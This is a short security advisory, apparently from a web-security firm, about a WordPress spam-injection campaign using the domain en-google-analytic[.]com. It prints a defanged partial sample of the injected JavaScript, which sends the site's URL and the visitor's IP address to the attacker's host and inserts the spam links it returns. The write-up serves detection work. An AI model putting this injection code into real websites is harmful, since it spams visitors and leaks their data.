The domain en-google-analytic[.]com, currently sinkholed by a security intelligence company, has been observed by our team to be part of a mass spam injection campaign. This attack was active as far back as February 2016 according to the Internet Archive Wayback Machine.
We have seen recent cases in the wild where a script is injected into WordPress posts. The script then generates an AJAX request from a visitor’s web browser to the following URL format:
hxxp://en-google-analytic[.]com/client-slots/check/<fully qualified domain name>;<base64 encoded string of the URL>;<string of the IP address>;ver1_0
The results are then inserted directly into the document body by using JavaScript to insert spam links (as shown in the partial sample below):
clientInfo.callGet('hxxp://en-google-analytic[.]com/client-slots/check/' + dataString, function(dataLinks) {
if (dataLinks) {
dataLinks =
JSON.parse(dataLinks);
for (var i = 0; i < dataLinks.length; i++) {
var div1 = document.createElement('a');
div1.title = dataLinks[i].anchor;
div1.href = dataLinks[i].href;
div1.setAttribute('style', 'display:block;');
div1.innerHTML = dataLinks[i].anchor;
document.body.insertBefore(div1, document.body.firstChild);
}
} It’s worth noting that this piece of malware captures the IP address using a remote request to api.ipify.org which is a legitimate third-party API service.
So, if you happen to stumble upon references to en-google-analytic[.]com on your website or in your WordPress posts, it would be a good idea to have the site checked out to make sure it’s not infected with spam as part of this campaign.